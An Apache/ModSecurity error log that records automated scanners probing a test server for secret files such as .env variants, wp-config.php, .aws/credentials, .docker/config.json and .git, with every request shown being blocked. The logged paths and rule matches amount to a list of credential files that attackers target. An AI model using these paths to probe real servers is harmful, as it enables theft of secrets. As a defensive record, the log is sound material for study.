[Sat Sep 28 19:27:48.822498 2024] [:error] [pid 2261889] [client 45.135.232.70:56052] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wordpress/wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wordpress/wp-config.php"] [unique_id "Zvg8lFqeHCRD_JMeF92BQQAAAAA"]
[Sat Sep 28 19:27:48.822756 2024] [:error] [pid 2261889] [client 45.135.232.70:56052] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wordpress/wp-config.php"] [unique_id "Zvg8lFqeHCRD_JMeF92BQQAAAAA"]
[Sat Sep 28 19:27:48.822932 2024] [:error] [pid 2261889] [client 45.135.232.70:56052] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wordpress/wp-config.php"] [unique_id "Zvg8lFqeHCRD_JMeF92BQQAAAAA"]
[Sat Sep 28 19:27:48.841186 2024] [:error] [pid 2249660] [client 45.135.232.70:56068] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wordpress/wp-content/uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wordpress/wp-content/uploads/.env"] [unique_id "Zvg8lJBQfEe6xIb_MNUkTQAAAAg"]
[Sat Sep 28 19:27:48.841453 2024] [:error] [pid 2249660] [client 45.135.232.70:56068] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wordpress/wp-content/uploads/.env"] [unique_id "Zvg8lJBQfEe6xIb_MNUkTQAAAAg"]
[Sat Sep 28 19:27:48.841629 2024] [:error] [pid 2249660] [client 45.135.232.70:56068] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wordpress/wp-content/uploads/.env"] [unique_id "Zvg8lJBQfEe6xIb_MNUkTQAAAAg"]
[Sat Sep 28 19:41:20.239318 2024] [authz_core:error] [pid 2249653] [client 195.178.110.21:51756] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Sep 29 00:30:49.558712 2024] [authz_core:error] [pid 2268908] [client 195.178.110.21:43776] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Sep 29 10:36:27.033676 2024] [authz_core:error] [pid 2273657] [client 45.148.10.206:59322] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Sep 30 03:12:38.440067 2024] [authz_core:error] [pid 2292852] [client 45.135.232.70:37640] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.appveyor.yml
[Mon Sep 30 03:12:38.441458 2024] [:error] [pid 2292827] [client 45.135.232.70:37654] [client 45.135.232.70] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "Zvn7BqppUB6RwzyOV3GHkgAAAAA"]
[Mon Sep 30 03:12:38.442475 2024] [:error] [pid 2292827] [client 45.135.232.70:37654] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "Zvn7BqppUB6RwzyOV3GHkgAAAAA"]
[Mon Sep 30 03:12:38.442681 2024] [:error] [pid 2292827] [client 45.135.232.70:37654] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/config"] [unique_id "Zvn7BqppUB6RwzyOV3GHkgAAAAA"]
[Mon Sep 30 03:12:38.529903 2024] [:error] [pid 2292831] [client 45.135.232.70:37660] [client 45.135.232.70] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Zvn7Bqb0PnYyMP2Lu2ExsgAAAAQ"]
[Mon Sep 30 03:12:38.530579 2024] [:error] [pid 2292831] [client 45.135.232.70:37660] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Zvn7Bqb0PnYyMP2Lu2ExsgAAAAQ"]
[Mon Sep 30 03:12:38.531039 2024] [:error] [pid 2292831] [client 45.135.232.70:37660] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Zvn7Bqb0PnYyMP2Lu2ExsgAAAAQ"]
[Mon Sep 30 03:12:38.604248 2024] [authz_core:error] [pid 2292830] [client 45.135.232.70:37682] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.circleci
[Mon Sep 30 03:12:38.762559 2024] [authz_core:error] [pid 2292828] [client 45.135.232.70:37698] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.composer
[Mon Sep 30 03:12:39.061127 2024] [:error] [pid 2292831] [client 45.135.232.70:51022] [client 45.135.232.70] ModSecurity: Warning. Matched phrase ".docker/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .docker/ found within REQUEST_FILENAME: /.docker/config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "Zvn7B6b0PnYyMP2Lu2ExswAAAAQ"]
[Mon Sep 30 03:12:39.061556 2024] [:error] [pid 2292831] [client 45.135.232.70:51022] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "Zvn7B6b0PnYyMP2Lu2ExswAAAAQ"]
[Mon Sep 30 03:12:39.061832 2024] [:error] [pid 2292831] [client 45.135.232.70:51022] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.docker/config.json"] [unique_id "Zvn7B6b0PnYyMP2Lu2ExswAAAAQ"]
[Mon Sep 30 03:12:39.071965 2024] [authz_core:error] [pid 2292830] [client 45.135.232.70:51038] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.drone.yml
[Mon Sep 30 03:12:39.114105 2024] [:error] [pid 2293061] [client 45.135.232.70:51182] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "Zvn7B_4plfEpgwUkwScOZwAAAAc"]
[Mon Sep 30 03:12:39.116091 2024] [authz_core:error] [pid 2292828] [client 45.135.232.70:51278] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Mon Sep 30 03:12:39.117342 2024] [:error] [pid 2292829] [client 45.135.232.70:51156] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.live"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.live"] [unique_id "Zvn7B1EYK8s8ohUI_TBInAAAAAI"]
[Mon Sep 30 03:12:39.118049 2024] [:error] [pid 2292829] [client 45.135.232.70:51156] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.live"] [unique_id "Zvn7B1EYK8s8ohUI_TBInAAAAAI"]
[Mon Sep 30 03:12:39.120279 2024] [:error] [pid 2292829] [client 45.135.232.70:51156] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.live"] [unique_id "Zvn7B1EYK8s8ohUI_TBInAAAAAI"]
[Mon Sep 30 03:12:39.121153 2024] [:error] [pid 2293049] [client 45.135.232.70:51158] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Zvn7B0SJuE_IczKl7y4ueQAAAAY"]
[Mon Sep 30 03:12:39.121549 2024] [:error] [pid 2293049] [client 45.135.232.70:51158] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Zvn7B0SJuE_IczKl7y4ueQAAAAY"]
[Mon Sep 30 03:12:39.121900 2024] [:error] [pid 2293049] [client 45.135.232.70:51158] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Zvn7B0SJuE_IczKl7y4ueQAAAAY"]
[Mon Sep 30 03:12:39.122932 2024] [:error] [pid 2293061] [client 45.135.232.70:51182] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "Zvn7B_4plfEpgwUkwScOZwAAAAc"]
[Mon Sep 30 03:12:39.123269 2024] [:error] [pid 2293061] [client 45.135.232.70:51182] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "Zvn7B_4plfEpgwUkwScOZwAAAAc"]
[Mon Sep 30 03:12:39.124331 2024] [:error] [pid 2292827] [client 45.135.232.70:51200] [client 45.135.232.70] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "Zvn7B6ppUB6RwzyOV3GHlAAAAAA"]
[Mon Sep 30 03:12:39.124528 2024] [:error] [pid 2292827] [client 45.135.232.70:51200] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "Zvn7B6ppUB6RwzyOV3GHlAAAAAA"]
[Mon Sep 30 03:12:39.124761 2024] [:error] [pid 2292827] [client 45.135.232.70:51200] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "Zvn7B6ppUB6RwzyOV3GHlAAAAAA"]
[Mon Sep 30 03:12:39.124950 2024] [:error] [pid 2292827] [client 45.135.232.70:51200] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "Zvn7B6ppUB6RwzyOV3GHlAAAAAA"]
[Mon Sep 30 03:12:39.171306 2024] [authz_core:error] [pid 2292830] [client 45.135.232.70:51300] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Mon Sep 30 03:12:39.174559 2024] [:error] [pid 2292831] [client 45.135.232.70:51066] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zvn7B6b0PnYyMP2Lu2ExtAAAAAQ"]
[Mon Sep 30 03:12:39.175110 2024] [:error] [pid 2292831] [client 45.135.232.70:51066] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zvn7B6b0PnYyMP2Lu2ExtAAAAAQ"]
[Mon Sep 30 03:12:39.175389 2024] [:error] [pid 2292831] [client 45.135.232.70:51066] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zvn7B6b0PnYyMP2Lu2ExtAAAAAQ"]
[Mon Sep 30 03:12:39.185987 2024] [:error] [pid 2292852] [client 45.135.232.70:51096] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "Zvn7B9yjaeShYxtARZtiUwAAAAU"]
[Mon Sep 30 03:12:39.186625 2024] [:error] [pid 2292852] [client 45.135.232.70:51096] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "Zvn7B9yjaeShYxtARZtiUwAAAAU"]
[Mon Sep 30 03:12:39.187086 2024] [:error] [pid 2292852] [client 45.135.232.70:51096] [client 45.135.232.70] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "Zvn7B9yjaeShYxtARZtiUwAAAAU"]
[Mon Sep 30 03:12:39.211218 2024] [authz_core:error] [pid 2292828] [client 45.135.232.70:51320] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Mon Sep 30 03:12:39.215596 2024] [authz_core:error] [pid 2292829] [client 45.135.232.70:51266] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Mon Sep 30 03:12:39.225524 2024] [authz_core:error] [pid 2293061] [client 45.135.232.70:51274] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.github
[Mon Sep 30 03:12:39.226969 2024] [authz_core:error] [pid 2292827] [client 45.135.232.70:51126] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Mon Sep 30 03:12:39.227778 2024] [:error] [pid 2293049] [client 45.135.232.70:51220] [client 45.135.232.70] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_1"] [unique_id "Zvn7B0SJuE_IczKl7y4uegAAAAY"]
[Mon Sep 30 03:12:39.228140 2024] [:error] [pid 2293049] [client 45.135.232.70:51220] [client 45.135.232.70] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_1"] [unique_id "Zvn7B0SJuE_IczKl7y4uegAAAAY"]
